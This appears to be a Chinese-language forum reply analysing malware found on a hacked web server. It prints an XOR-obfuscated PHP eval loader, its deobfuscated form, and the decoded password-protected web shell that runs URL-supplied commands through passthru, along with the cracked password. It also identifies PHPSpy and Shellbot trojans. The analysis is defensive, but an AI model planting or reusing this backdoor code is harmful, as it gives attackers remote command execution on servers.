这里发生了一些有趣的事情。PHP块评估为一个不错的“代码生成器”:
$k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53=70;
$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$s32t83r16i71n72g_o95u53t9p47u16t72=$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47;$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83=strlen($s32t83r16i71n72g_o95u53t9p47u16t72);
$e72v71a16l_p83h32p_c95o53d9e47='';
for($h47u9i53v95a32m83v16s71e72m=0;$h47u9i53v95a32m83v16s71e72m<$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83;$h47u9i53v95a32m83v16s71e72m++)
$e72v71a16l_p83h32p_c95o53d9e47 .= chr(ord($s32t83r16i71n72g_o95u53t9p47u16t72[$h47u9i53v95a32m83v16s71e72m]) ^ $k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53);
eval("?>".$e72v71a16l_p83h32p_c95o53d9e47."<?");
当用更易读的变量名替换不友好的变量名时,您将获得:
$Coefficient=70;
$InitialString="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$TargetString=$InitialString;
$CntLimit=strlen($TargetString);
$Output='';
for($i=0;$i<$CntLimit;$i++)
$Output .= chr(ord($TargetString[$i]) ^ $Coefficient);
eval("?>".$Output."<?");
当被评估时,会输出代码:
<?php
if ((isset($_GET[pass]))&(md5($_GET[pass])==
'417379a25e41bd0ac88f87dc3d029485')&(isset($_GET[c])))
{
echo '<pre>';
passthru(stripslashes($_GET[c]));
include($_GET[c]);
die('</pre>');
}
?>
需要注意的是,字符串'417379a25e41bd0ac88f87dc3d029485'
是密码Zrhenjq2009的MD5哈希值。
我会再花点时间来研究这个问题。
编辑:
好的,我又花了几分钟研究了一下。看起来这是一个远程控制脚本。因此,现在这个页面(new.php)位于您的服务器上,如果用户访问此页面并通过名为“pass”的URL参数传递值为“Zrhenjq2009”的参数,则可以通过将命令和参数作为名为“c”的参数传递到URL中来在服务器上执行外部命令。 因此,这正在变成一个代码生成器,它在服务器上创建了一个后门。相当酷。
我下载了您上传的文件,并通过VirusTotal.com对new.php进行了检查,结果显示它是一个新的(或大幅修改的)特洛伊木马。此外,似乎51.php是PHPSpy特洛伊木马:VirusTotal分析,74.php是PHP.Shellbot特洛伊木马:VirusTotal分析,而func.php是“由orb制作的WebShell”。 看起来有人在您的服务器上放了一个不错的黑客工具包,并提供了您上传文档中提到的ebay钓鱼脚本/页面。
您应该删除原帖中的文件下载链接。
如果您能够获取日志,研究一下可能会有趣。
祝好。